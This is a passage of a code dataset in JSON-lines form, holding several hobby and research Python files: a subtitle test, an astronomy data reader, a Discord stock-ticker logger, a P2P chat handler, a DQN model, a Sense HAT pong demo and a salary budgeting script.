')\n self.subtitles = storage.SubtitleSet.create_with_raw_ttml(ttml)\n\n def test_empty_subs(self):\n utils.assert_long_text_equal(self.subtitles.to_xml(), \"\"\"\\\n\n \n \n
\n \n\n\"\"\")\n\n\n def test_with_subs(self):\n self.subtitles.append_subtitle(1000, 1500, \"content\")\n self.subtitles.append_subtitle(2000, 2500, \"content\", escape=False)\n self.subtitles.append_subtitle(3000, 3500, \" content with space \")\n utils.assert_long_text_equal(self.subtitles.to_xml(), \"\"\"\\\n\n \n \n
\n

content

\n

content

\n

content with space

\n
\n \n
\n\"\"\")\n\n def test_with_new_paragraph(self):\n self.subtitles.append_subtitle(1000, 1500, \"content\")\n self.subtitles.append_subtitle(2000, 2500, \"content 2\", new_paragraph=True)\n utils.assert_long_text_equal(self.subtitles.to_xml(), \"\"\"\\\n\n \n \n
\n

content

\n
\n
\n

content 2

\n
\n \n
\n\"\"\")\n","repo_name":"pculture/babelsubs","sub_path":"babelsubs/tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"6135670807","text":"import numpy as np\nimport os\nfrom astropy.io import fits\n#import matplotlib.pyplot as plt\n\ncat_dir = ''\nssp_dir = ''\nmask_dir = ''\n\nhdu_cat = fits.open(cat_dir + 'TNG50_MaNGA_v13_Nview.fits')\nsnaps = hdu_cat[1].data['snapshot']\nsubhalo_id = hdu_cat[1].data['subhalo_id']\nifu_dsn = hdu_cat[1].data['manga_ifu_dsn']\nviews = hdu_cat[1].data['view']\n\n# mocks are not available for view>5, snap=0 or a few that got stopped \n# in the mocking process. Total mocks should be >10,0030.\n\n\nifu_masks, hdr = fits.getdata(mask_dir+'masks.fits', 0, header=True)\nSN = 3 # signal to noise cut in the i-flux, \n # generally 3 is enough to remove the large voronoi-like bins of the edges,\n # some galaxies might need a greater SN threshold\n\nind_in_cat = []\nband_maps = []\nvel_maps = []\ndisp_maps = []\nfor ii in range(10):#len(snaps)):\n ssp_name = ssp_dir + 'ilust-'+str(snaps[ii])+'-'+str(subhalo_id[ii])+\\\n '-'+str(views[ii])+'-127.cube.SSP.cube.fits.gz'\n if not os.path.exists(ssp_name):\n continue\n\n ssp_f = fits.open(ssp_name)\n sn_mask = np.where(ssp_f[0].data[3]/ssp_f[0].data[4]>SN, 1, np.nan)\n ifu_mask_ = np.where(ifu_masks[hdr['MASK'+str(ifu_dsn[0])]]==1, 1, np.nan)\n band_map_ = ssp_f[0].data[0] * ifu_mask_ * sn_mask\n band_maps.append(band_map_)\n vel_map_ = ssp_f[0].data[13] * ifu_mask_ * sn_mask\n vel_maps.append(vel_map_)\n disp_map_ = ssp_f[0].data[15] * ifu_mask_ * sn_mask\n disp_maps.append(disp_map_)\n \n ind_in_cat.append(ii)\n #plt.imshow(vel_map_)\n #plt.colorbar()\n #plt.show()\n\nband_maps = np.array(band_maps, dtype=np.float32)\nvel_maps = np.array(vel_maps, dtype=np.float32)\ndisp_maps = np.array(disp_maps, dtype=np.float32)\n\n","repo_name":"reginasar/using_MaNGIA","sub_path":"read_ssp.py","file_name":"read_ssp.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22476156403","text":"import spacy\nimport sqlite3\nimport pandas as pd\nimport json\nimport robin_stocks as r\nimport yfinance as yf\nimport re, string\nfrom os import makedirs, getcwd, path\nimport threading\nfrom datetime import datetime, timedelta\n#for the user, associate the user with the most recent stock he/she disccussed about\n#we can use the basic youtube trading algo for long term invtestment\n#use kelly formula, based the percentage on the faith of the discord chat\n\n#https://www.youtube.com/watch?v=Hi-zhLgP_TQ&ab_channel=%E5%BC%82%E7%95%8C%E7%95%AA%E8%8C%84%E8%AF%B4%E7%BE%8E%E8%82%A1\n#https://www.youtube.com/watch?v=FZ9Kf1xfA40&ab_channel=%E5%BC%82%E7%95%8C%E7%95%AA%E8%8C%84%E8%AF%B4%E7%BE%8E%E8%82%A1\n#theory of large numbers maybe each user in discord's call is following a prob distribution\n'''\nhigh cred: first to call out stock\n\t\tshortest duration\n\t\thighest gain\n\t\tlow number of people call out the same stock\n\t\t#returns prob of wining vs prob of losing and the amount to win and lose maxmize profit pass in kelly for each investment interval\n\t\t#the formula should mimic the behavior of a sigmoid function where x is the result from the parameters and y is the cred score\n\n\t\t#\\frac{6}{\\frac{1}{6}+e^{-x}\\ }\nlow: \n'''\n\n#\nimport logging\n\nclass VideoModel(object):\n\t#uses 
youtube model with kelly and discord chat faith determination\n\tdef __init__(self):\n\t\tpass\n\n\tdef kelly_formula(self):\n\t\tpass\n\n\n#this user can be removed each user its own table with \n#this allows to see which user have more influence on the stock market price is more accurate\n\n\nclass NLPstock(object):\n\tdef __init__(self, db_name=\"stocks.db\"):\n\t\tself.nlp = spacy.load(\"en_core_web_sm\")\n\t\tself.db_name = db_name\n\n\t\tself._current_time = datetime.now()\n\t\tself._date = self.current_time.date()\n\n\t@property\n\tdef current_time(self):\n\t\treturn self._current_time\n\t\t\n\t@current_time.setter \n\tdef current_time(self, ct):\n\t\t#self.start_hours = ct.replace(hour=9, minute=30, second=0, microsecond=0)\n\t\t#self.end_hours = ct.replace(hour=16, minute=00, second=0, microsecond=0)\n\t\t\n\t\tif (ct.hour >= 5) and (ct.hour < 14):\n\t\t\tself._date = (ct + timedelta(days=-1)).date()\n\t\tlogging.info(f\"setting time.. current hour is {ct.hour}, {self._date} \")\n\n\t\tself._current_time = ct\n\n\n\n\tdef update_stock_table(self, stock_tk, message, c):\n\t\tc.execute(\"SELECT * FROM %s WHERE today = ?\" % (stock_tk), (str(self._date),)) \n\t\trows = c.fetchall()\n\n\t\tlogging.info(f\"try to fetch for {str(self._date)} stock is {stock_tk} result {rows}\")\n\n\t\tif rows:\n\t\t\tc.execute(\"UPDATE %s SET today_count = today_count + 1 WHERE today = ?\" % (stock_tk), (str(self._date),))\n\t\t\tlogging.info(f\"find existing {str(self._date)} for stock {stock_tk}\")\n\t\telse:\n\t\t\t#first time of the day\n\t\t\tc.execute('INSERT INTO %s VALUES (?,?,?,?,?)'% (stock_tk), (\n\t\t\t\tself._date,\n\t\t\t\t0,\n\t\t\t\tNone,\n\t\t\t\tmessage['author']['id'],\n\t\t\t\tmessage['timestamp']\n\t\t\t))\n\t\t\tlogging.info(f\"NO existing {str(self._date)} for stock {stock_tk} creating..... 
\")\n\n\n\n\tdef insert_stock(self, stock_tk, tk_value, message):\n\t\tlogging.info(f\"inserting stock {stock_tk}.......\")\n\t\tdbdir = path.join(getcwd(), 'data')\n\t\tif not path.exists(dbdir):\n\t\t\tmakedirs(dbdir)\n\n\t\tdbfile = path.join(dbdir, self.db_name)\n\t\tdb = sqlite3.connect(dbfile)\n\t\tc = db.cursor()\n\n\t\tc.execute('''CREATE TABLE IF NOT EXISTS stocks (\n\t\t\tticker TEXT NOT NULL PRIMARY KEY,\n\t\t\tname TEXT,\n\t\t\tcount INTEGER,\n\t\t\tcall_user TEXT,\n\t\t\tcall_price REAL,\n\t\t\tcall_time TEXT\n\t\t)''')\n\n\n\t\tc.execute('INSERT INTO %s VALUES (?,?,?,?,?,?)'% (\"stocks\"), (\n\t\t\tstock_tk,\n\t\t\ttk_value.info['longName'],\n\t\t\t0,\n\t\t\tmessage['author']['id'],\n\t\t\ttk_value.history('1d')['Close'][0], \n\t\t\tmessage['timestamp']\n\t\t))\n\n\t\t#when the stock is already made sure to be true\n\t\tc.execute('''CREATE TABLE IF NOT EXISTS %s (\n\t\t\ttoday TEXT NOT NULL PRIMARY KEY,\n\t\t\ttoday_count INTEGER,\n\t\t\ttop_user TEXT,\n\t\t\tfirst_call TEXT,\n\t\t\tcall_time TEXT\n\t\t)''' %(stock_tk)) \n\n\t\tself.update_stock_table(stock_tk, message, c)\n\n\t\tlogging.info(f\"{stock_tk} Insert Sucess\")\n\t\tdb.commit()\n\t\tdb.close()\n\n\n\tdef stock_in_table(self, stock_tk, message):\n\t\tlogging.info(f\"Finding stock {stock_tk} in tab\")\n\n\t\tdbdir = path.join(getcwd(), 'data')\n\t\tif not path.exists(dbdir):\n\t\t\tmakedirs(dbdir)\n\n\t\tdbfile = path.join(dbdir, self.db_name)\n\t\tdb = sqlite3.connect(dbfile)\n\t\tc = db.cursor()\n\n\t\tc.execute('''CREATE TABLE IF NOT EXISTS stocks (\n\t\t\tticker TEXT NOT NULL PRIMARY KEY,\n\t\t\tname TEXT,\n\t\t\tcount INTEGER,\n\t\t\tcall_user TEXT,\n\t\t\tcall_price REAL,\n\t\t\tcall_time TEXT\n\t\t)''')\n\n\t\t\n\t\tc.execute(\"SELECT * FROM stocks WHERE ticker = ?\", (stock_tk,)) \n\t\trows = c.fetchall()\n\t\t\n\t\tif rows:\n\t\t\tc.execute(\"UPDATE stocks SET count = count + 1 WHERE ticker = ?\", (stock_tk,))\n\t\t\tself.update_stock_table(stock_tk, message, c)\n\t\t\tdb.commit()\n\t\t\tdb.close()\n\t\t\treturn True\n\t\telse:\n\t\t\tdb.close()\n\t\t\treturn False\n\t\t\n\n\t\t\n\n\n\n\n\n\tdef get_stocks(self, message):\n\t\tstring_value = message['content']\n\t\tself.doc = self.nlp(string_value)\n\t\tstock_list = [x.text for x in self.doc.ents if x.label_ == \"ORG\"]\n\t\tstock_list += re.findall(\"[A-Z]{2,}\", string_value)\n\t\tstock_list = set(stock_list)\n\n\n\t\tstock_string = []\n\n\t\tfor stock in stock_list:\n\t\t\tprocessed_stock = self.process_org(stock, message)\n\t\t\tif processed_stock:\n\t\t\t\tstock_string.append(processed_stock)\n\n\t\treturn stock_string\n\n\n\n\n\n\tdef process_org(self, stock, message):#for processing the org into a ticker\n\t\tstock =stock.strip()\n\t\tstock = \" \".join(re.findall(\"[a-zA-Z]+\", stock))\n\t\tif (len(stock) > 4) or (len(stock) < 2):\n\t\t\t#print(f\"Failed: {stock}\")\n\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\tif self.stock_in_table(stock, message):\n\t\t\t\t\tlogging.info(f\"{stock} already in table\")\n\t\t\t\t\treturn stock\n\n\t\t\t\ttk = yf.Ticker(stock)\n\t\t\t\t#t = threading.Thread()\n\t\t\t\tself.insert_stock(stock, tk, message)\n\t\t\t\treturn stock\n\n\t\t\texcept KeyError:\n\t\t\t\tlogging.info(f\"Yahoo cant find {stock}\")\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.info(f'Weird stock bugg {stock}')\n\n\t\t\t#this means either it contains the $ or its not a stock we are looking for\n\n\n\n\n\t\n\n\n\nif __name__ == 
\"__main__\":\n\n\tpass\n","repo_name":"fredryce/stocker","sub_path":"textmine.py","file_name":"textmine.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25191275665","text":"__author__ = 'kowalski'\n\nimport config\nimport base.net\nimport base.new_CSR\nimport base.text\n\n\ndef event_handler(number, conn=None):\n num = int(number[1:])\n # отключение или одного соединения, или мы - клиент\n if num == 1:\n if conn is None:\n base.text.write_to_screen(\"Соединение закрыто.\", \"System\")\n for i in config.send_array:\n i.send(\"-001\".encode())\n config.send_array.clear()\n config.get_array.clear()\n config.address_array.clear()\n else:\n base.text.write_to_screen(\"Соединение через \" + conn.getpeername()\n [0] + \" закрыто.\", \"System\")\n for i in config.send_array:\n if i.getpeername()[0] == conn.getpeername()[0]:\n config.send_array.remove(i)\n break\n config.get_array.remove(conn)\n config.address_array.remove(conn.getpeername()[0])\n # смена ник��\n elif num == 2:\n name = base.net.net_catch(conn)\n if (is_username_free(name)):\n base.text.write_to_screen(\n \"Пользователь \" + config.username_array[conn] +\n \" изменил свой ник на \" + name, \"System\")\n config.username_array[conn] = name\n config.contact_array[\n conn.getpeername()[0]] = [conn.getpeername()[1], name]\n # при подключении пользователя к серверу разослать его адрес и\n # порт для отрпавки сообщения\n elif num == 4:\n data = conn.recv(4)\n data = conn.recv(int(data.decode(encoding='UTF-8')))\n base.new_CSR.Client(data.decode(encoding='UTF-8'),\n int(config.contact_array[conn.getpeername()[0]][0])\n ).start()\n\n\ndef is_username_free(name):\n \"\"\"Прорверить, занят ли никнейм.\"\"\"\n for conn in config.username_array:\n if name == config.username_array[conn] or name == config.username:\n return False\n return True\n\n\ndef pass_friends(conn):\n \"\"\"Отправка информации о соединения пользователья к серверу текущим\n пользователям\"\"\"\n for connection in config.send_array:\n if conn.getpeername()[0] != connection.getpeername()[0]:\n conn.send(\"-004\".encode(encoding='UTF-8'))\n conn.send(\n base.net.format_number(len(connection.getpeername()[0]))\n .encode(encoding='UTF-8'))\n # отправка ip адреса\n conn.send(connection.getpeername()[0].encode(encoding='UTF-8'))\n","repo_name":"KowalskiP/University","sub_path":"Python/python-task/P2PChat/base/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1050543160","text":"def isPalidrome(s):\n n=len(s)\n if n==0:\n return False \n for i in range(0,n//2):\n if s[i]!=s[n-i-1]:\n return False\n return True\ndef solve(s,left,right,size):\n if left>=size+(right-size):\n print(s)\n return\n for i in range(left,right+1):\n if(isPalidrome(s[left:i])):\n str1=s[:i]+\" \"+s[i:]\n solve(str1,i+1,right+1,size)\n\ns=str(input())\n(solve(s,0,len(s),len(s)))","repo_name":"19521242bao/CS112.L13.KHCL","sub_path":"Chuỗi con.py","file_name":"Chuỗi con.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35143500941","text":"from baselines.ddpg.memory import Memory\nfrom baselines.ddpg.noise import *\nfrom src.config.config import Config\nimport tensorflow as tf\nimport itertools\nfrom src.model.tensorflowBasedModel import TensorflowBasedModel\nfrom 
src.model.utils.networkCreator import NetworkCreator\nimport tensorflow.contrib as tfcontrib\n\n\nclass DQNModel(TensorflowBasedModel):\n    key_list = Config.load_json(file_path=None)\n\n    def __init__(self, config, action_bound):\n        super(DQNModel, self).__init__(config=config)\n        self.proposed_action_list = []\n        self.action_bound = action_bound\n        action_list = []\n        for i in range(len(action_bound[0])):\n            low = action_bound[0][i]\n            high = action_bound[1][i]\n            action_list.append(np.arange(start=low,\n                                         stop=high,\n                                         step=(high - low) / self.config.config_dict['ACTION_SPLIT_COUNT']))\n        action_iterator = itertools.product(*action_list)\n        self.action_selection_list = []\n        for action_sample in action_iterator:\n            # cast to float32 so the constants can be concatenated with the float32 placeholders\n            self.action_selection_list.append(tf.constant(action_sample, dtype=tf.float32))\n\n        self.reward_input = tf.placeholder(shape=[None, 1], dtype=tf.float32)\n\n        self.state_input = tf.placeholder(shape=[None] + list(self.config.config_dict['STATE_SPACE']), dtype=tf.float32)\n        self.next_state_input = tf.placeholder(shape=[None] + list(self.config.config_dict['STATE_SPACE']),\n                                               dtype=tf.float32)\n        self.action_input = tf.placeholder(shape=[None] + list(self.config.config_dict['ACTION_SPACE']),\n                                           dtype=tf.float32)\n        self.done_input = tf.placeholder(shape=[None, 1], dtype=tf.bool)\n        self.input = tf.concat([self.state_input, self.action_input], axis=1)\n        self.done = tf.cast(self.done_input, dtype=tf.float32)\n\n        self.q_value_list = []\n        var_list = None\n        for action_sample in self.action_selection_list:\n            # tile the constant action across the batch so it can be concatenated with\n            # the [batch, state_dim] state input (the original passed the raw constant\n            # straight into tf.concat, which is not a valid call)\n            tiled_action = tf.tile(tf.expand_dims(action_sample, axis=0),\n                                   [tf.shape(self.state_input)[0], 1])\n            q_net, q_output, var_list = NetworkCreator.create_network(input=tf.concat([self.state_input, tiled_action], axis=1),\n                                                                      network_config=self.config.config_dict[\n                                                                          'NET_CONFIG'],\n                                                                      net_name=self.config.config_dict['NAME'])\n            self.q_value_list.append(q_output)\n        self.var_list = var_list\n\n        self.target_q_value_list = []\n        for action_sample in self.action_selection_list:\n            tiled_action = tf.tile(tf.expand_dims(action_sample, axis=0),\n                                   [tf.shape(self.next_state_input)[0], 1])\n            q_net, q_output, var_list = NetworkCreator.create_network(\n                input=tf.concat([self.next_state_input, tiled_action], axis=1),\n                network_config=self.config.config_dict[\n                    'NET_CONFIG'],\n                net_name='TARGET' + self.config.config_dict['NAME'])\n            # append the target q outputs to their own list; the original appended to\n            # self.target_var_list before that attribute existed\n            self.target_q_value_list.append(q_output)\n        self.target_var_list = var_list\n\n        self.loss, self.optimizer, self.optimize = self.create_training_method()\n        self.update_target_q_op = self.create_target_q_update()\n        self.memory = Memory(limit=int(1e6),  # bounded replay size; the original 1e100 cannot be allocated\n                             action_shape=self.config.config_dict['ACTION_SPACE'],\n                             observation_shape=self.config.config_dict['STATE_SPACE'])\n        self.sess = tf.get_default_session()\n\n    def update(self):\n        for i in range(self.config.config_dict['ITERATION_EVER_EPOCH']):\n            batch_data = self.memory.sample(batch_size=self.config.config_dict['BATCH_SIZE'])\n            loss = self.sess.run(fetches=[self.loss, self.optimize],\n                                 feed_dict={\n                                     self.reward_input: batch_data['rewards'],\n                                     self.action_input: batch_data['actions'],\n                                     self.state_input: batch_data['obs0'],\n                                     self.done_input: batch_data['terminals1']\n                                 })\n\n    def predict(self, obs, q_value):\n        pass\n\n    def print_log_queue(self, status):\n        self.status = status\n        while self.log_queue.qsize() > 0:\n            log = self.log_queue.get()\n            print(\"%s: Critic loss %f: \" %\n                  (self.name, log[self.name + '_CRITIC']))\n            log['INDEX'] = self.log_print_count\n            self.log_file_content.append(log)\n            self.log_print_count += 1\n\n    def create_training_method(self):\n        l1_l2 = tfcontrib.layers.l1_l2_regularizer()\n        loss = tf.reduce_sum((self.predict_q_value - self.q_output) ** 2) + \\\n               tfcontrib.layers.apply_regularization(l1_l2, weights_list=self.var_list)\n        optimizer = 
tf.train.AdadeltaOptimizer(learning_rate=self.config.config_dict['LEARNING_RATE'])\n        optimize_op = optimizer.minimize(loss=loss, var_list=self.var_list)\n        return loss, optimizer, optimize_op\n\n    def create_predict_q_value_op(self):\n\n        predict_q_value = (1. - self.done) * self.config.config_dict['DISCOUNT'] * self.target_q_output \\\n                          + self.reward_input\n        return predict_q_value\n\n    def create_target_q_update(self):\n        op = []\n        for var, target_var in zip(self.var_list, self.target_var_list):\n            ref_val = self.config.config_dict['DECAY'] * target_var + (1.0 - self.config.config_dict['DECAY']) * var\n            # soft update: assign the blended value onto the target variable\n            # (the original assigned var onto the computed tensor, which is backwards)\n            op.append(tf.assign(target_var, ref_val))\n        return op\n\n    def store_one_sample(self, state, next_state, action, reward, done, *arg, **kwargs):\n        self.memory.append(obs0=state,\n                           obs1=next_state,\n                           action=action,\n                           reward=reward,\n                           terminal1=done)\n","repo_name":"cap-ntu/intelligent-trainer","sub_path":"src/model/dqnModel/TEMPdqnModel.py","file_name":"TEMPdqnModel.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"39961936545","text":"from sense_hat import SenseHat, ACTION_PRESSED\nimport time\n\nsense = SenseHat()\nsense.clear()\n\n\nwhite = [255, 255, 255]\nred = [255, 0, 0]\ngreen = [0, 255, 0]\nblue = [0, 0, 255]\ncyan = [0, 255, 255]\npink = [255, 0, 255]\nyellow = [255, 255, 0]\ngray = [100, 100, 100]\noff = [0, 0, 0]\n\ngame_display = ( [off] * 8 * 7 ) + ( [gray] * 8 )\n\ndef set_game_pixel(x, y, color):\n    global game_display\n    game_display[ x + ( y * 8 ) ] = color\n\ndef update_game_display():\n    global game_display\n    game_display = ( [off] * 8 * 7 ) + ( [gray] * 8 )\n    #for i in [-1, 0, 1]:\n    #    set_game_pixel(player.x + 1, player.y + i, color)\n    #    set_game_pixel(bot.x - 1, bot.y + 1, bot.color)\n    set_game_pixel(ball.x, ball.y, ball.color)\n    #for i in range(player.score):\n    #    set_game_pixel(i, 7, player.score_color)\n    #for i in range(bot.score):\n    #    set_game_pixel(7 - i, 7, bot.score_color)\n\nclass Ball:\n    def __init__(self, start_x, start_y, color):\n        self.start_x = start_x\n        self.start_y = start_y\n        self.color = color\n        self.x = start_x\n        self.y = start_y\n        self.vel_x = 0\n        self.vel_y = 0\n    def move(self):\n        if self.y == 0 or self.y == 6:\n            self.vel_y *= -1\n        if self.x == 0:\n            #bot_score += 1\n            #start_round()\n            print(\"score!\")\n            self.vel_x *= -1\n        elif self.x == 7:\n            #player_score += 1\n            #start_round()\n            print(\"score!\")\n            self.vel_x *= -1\n        elif game_display[ ( self.x + self.vel_x ) + ( ( self.y + self.vel_y ) * 8 ) ] not in [off, gray] :\n            # use vel_y for the vertical offset (the original reused vel_x here)\n            print(\"collision\")\n        self.x += self.vel_x\n        self.y += self.vel_y\n\nball = Ball(1, 3, white)\nball.vel_x = 1\nball.vel_y = 1\n\nwhile True:\n    sense.clear()\n    ball.move()\n    update_game_display()\n    sense.set_pixels(game_display)\n    time.sleep(.1)\n","repo_name":"jorgenmiller/SenseHat","sub_path":"pong/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"21452700215","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n    def jump(self, nums):\n        \"\"\"\n        Solution: Greedy\n        Time Complexity: O(n)\n        Space Complexity: O(1)\n        TP:\n        - Using greedy to update farthest point we can reach at each jump\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        if not nums or len(nums)==1:\n            return 0\n        jump=nextfar=curfar=0\n        m=len(nums)\n        for i in range(m):\n            nextfar=max(i+nums[i],nextfar)\n            if nextfar >= m-1:\n                return jump+1\n            if i == 
curfar:\n jump+=1\n curfar=nextfar\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"45_Jump_Game_II/Greedy.py","file_name":"Greedy.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24307938802","text":"\"\"\"\nA simple app demonstrating how to manually construct a navbar with a customised\nlayout using the Navbar component and the supporting Nav, NavItem, NavLink,\nNavbarBrand, and NavbarToggler components.\nRequires dash-bootstrap-components 0.3.0 or later\n\"\"\"\nimport dash\nimport dash_bootstrap_components as dbc\nfrom dash import Input, Output, State, html\n\nPLOTLY_LOGO = \"https://images.plot.ly/logo/new-branding/plotly-logomark.png\"\n\napp = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])\nnav_item = dbc.NavItem(dbc.NavLink(\"Link\", href=\"#\"))\n\n# make a reuseable dropdown for the different examples\ndropdown = dbc.DropdownMenu(\n children=[\n dbc.DropdownMenuItem(\"Entry 1\"),\n dbc.DropdownMenuItem(\"Entry 2\"),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\"Entry 3\"),\n ],\n nav=True,\n in_navbar=True,\n label=\"Menu\",\n)\n\n# this is the default navbar style created by the NavbarSimple component\ndefault = dbc.NavbarSimple(\n children=[nav_item, dropdown],\n brand=\"Default\",\n brand_href=\"#\",\n sticky=\"top\",\n className=\"mb-5\",\n)\n\n# here's how you can recreate the same thing using Navbar\n# (see also required callback at the end of the file)\ncustom_default = dbc.Navbar(\n dbc.Container(\n [\n dbc.NavbarBrand(\"Custom default\", href=\"#\"),\n dbc.NavbarToggler(id=\"navbar-toggler1\"),\n dbc.Collapse(\n dbc.Nav(\n [nav_item, dropdown], className=\"ms-auto\", navbar=True\n ),\n id=\"navbar-collapse1\",\n navbar=True,\n ),\n ]\n ),\n className=\"mb-5\",\n)\n\n# this example that adds a logo to the navbar brand\nlogo = dbc.Navbar(\n dbc.Container(\n [\n html.A(\n # Use row and col to control vertical alignment of logo / brand\n dbc.Row(\n [\n dbc.Col(html.Img(src=PLOTLY_LOGO, height=\"30px\")),\n dbc.Col(dbc.NavbarBrand(\"Simulador de Portfolio\", className=\"ms-2\")),\n ],\n align=\"center\",\n className=\"g-0\",\n ),\n href=\"https://www.entercapital.com.br/fundos?gclid=Cj0KCQjwsrWZBhC4ARIsAGGUJurewh14oGuAAFmJE7JiGhM52UfrYrCIZ2RAcdlnwn9s_jY1lcsYDO0aAgO7EALw_wcB\",\n style={\"textDecoration\": \"none\"},\n ),\n dbc.NavbarToggler(id=\"navbar-toggler2\", n_clicks=0),\n dbc.Collapse(\n dbc.Nav(\n [nav_item, dropdown],\n className=\"ms-auto\",\n navbar=True,\n ),\n id=\"navbar-collapse2\",\n navbar=True,\n ),\n ],\n ),\n color=\"dark\",\n dark=True,\n className=\"mb-5\",\n)\n\n\napp.layout = html.Div(\n logo\n)\n\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8000)","repo_name":"lucasaos52/demo-app3","sub_path":"debugg.py","file_name":"debugg.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22096957860","text":"###\n### Author: Xin Li\n### Description: In this PA, you will be writing a program\n### that helps a user visualize and understand how much money\n### they spend of various categories of expenditures.\n### Perhaps you will even find this program useful for your personal finances!\n### Name of this program is: wheres_the_money.py\n###\nprint('''-----------------------------\n----- WHERE'S THE MONEY -----\n-----------------------------''')\nfrom os import _exit as exit\nsalary = input('What is your 
annual salary?\\n')\nif salary.isnumeric()==True :\n salary=float(salary)\nelse:\n print('Must enter positive integer for salary.')\n exit (0)\nif salary < 0 :\n print('Must enter positive integer for salary.\\n')\n exit(0)\n\nrent = input('How much is your monthly mortgage or rent?\\n')\nif rent.isnumeric()==True :\n rent=float(rent)\nelse:\n print('Must enter positive integer for mortgage or rent.')\n exit(0)\nif rent < 0 :\n print('Must enter positive integer for mortgage or rent.')\n exit(0)\n\nbills = input('What do you spend on bills monthly?\\n')\nif bills.isnumeric()==True:\n bills=float(bills)\nelse:\n print('Must enter positive integer for bills.')\n exit(0)\nif bills < 0 :\n print('Must enter positive integer for bills.')\n exit(0)\n\nfood = input('What are your weekly grocery/food expenses?\\n')\nif food.isnumeric()==True:\n food=float(food)\nelse:\n print('Must enter positive integer for food.')\n exit(0)\nif food < 0 :\n print('Must enter positive integer for food.')\n exit(0)\n\ntravel = input('How much do you spend on travel annually?\\n')\nif travel.isnumeric()==True:\n travel=float(travel)\nelse:\n print('Must enter positive integer for travel.')\n exit(0)\nif travel < 0 :\n print('Must enter positive integer for travel.')\n exit(0)\n\n\nif salary > 200000 :\n tax_percent = 30\nelif 75000 < salary <= 200000 :\n tax_percent = 25\nelif 15000 < salary <= 75000 :\n tax_percent = 20\nelif 0 <= salary <= 15000 :\n tax_percent = 10\nsalary_tax = salary * (tax_percent / 100.0)\n\nrent = rent * 12\nbills = bills * 12\nfood = food * 52\ntax = salary_tax\nif tax >= 50000 :\n tax1 = 50000\nelse:\n tax1 = tax\nextra = salary - rent - bills - food - travel - tax1\nrent_percent = (rent / salary)*100.0\nbills_percent = (bills / salary)*100.0\nfood_percent = (food / salary)*100.0\ntravel_percent = (travel / salary)*100.0\ntax1_percent = (tax1 / salary)*100.0\nextra_percent = (extra / salary)*100.0\n\nsalary1 = format(salary, '10,.2f')\nrent = format(rent, '10,.2f')\nbills = format(bills, '10,.2f')\nfood = format(food, '10,.2f')\ntravel = format(travel, '10,.2f')\ntax1 = format(tax1,'10,.2f')\nextra = format(extra, '10,.2f')\nrent_percent1 = format(rent_percent, '6.1f')\nbills_percent1 = format(bills_percent, '6.1f')\nfood_percent1 = format(food_percent, '6.1f')\ntravel_percent1 = format(travel_percent, '6.1f')\ntax1_percent1 = format(tax1_percent, '6.1f')\nextra_percent1 = format(extra_percent, '6.1f')\n\n#compare the biggest\nif rent_percent > bills_percent :\n a = rent_percent\nelse:\n a = bills_percent\nif food_percent > travel_percent :\n b = food_percent\nelse:\n b = travel_percent\nif tax1_percent >extra_percent :\n c = tax1_percent\nelse:\n c = extra_percent\nif a > b :\n l = a\nelse:\n l = b\nif l > c :\n l = l\nelse:\n l = c\nl = int(l)\nprint(' ')\nprint('------------------------------------------'+'-'*l)\nprint('See the financial breakdown below, based on a salary of $',int(salary), sep='')\nprint('------------------------------------------'+'-'*l)\nprint('| mortgage/rent | $ ', rent,' |',rent_percent1,'%'+' '+'| '+'#'*int(rent_percent), sep='')\nprint('| bills | $ ', bills,' |',bills_percent1,'%'+' '+'| '+'#'*int(bills_percent), sep='')\nprint('| food | $ ', food,' |',food_percent1,'%'+' '+'| '+'#'*int(food_percent), sep='')\nprint('| travel | $ ', travel,' |',travel_percent1,'%'+' '+'| '+'#'*int(travel_percent), sep='')\nprint('| tax | $ ', tax1,' |',tax1_percent1,'%'+' '+'| '+'#'*int(tax1_percent), sep='')\nprint('| extra | $ ', extra,' |',extra_percent1,'%'+' '+'| 
'+'#'*int(extra_percent), sep='')\nprint('------------------------------------------'+'-'*l)\nif tax >= 50000 :\n    print('>>> TAX LIMIT REACHED <<<')\nif int(extra_percent) < 0 :\n    print('>>> WARNING: DEFICIT <<<')\n","repo_name":"xinli2/Where-s-The-Money","sub_path":"wheres_the_money.py","file_name":"wheres_the_money.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"}
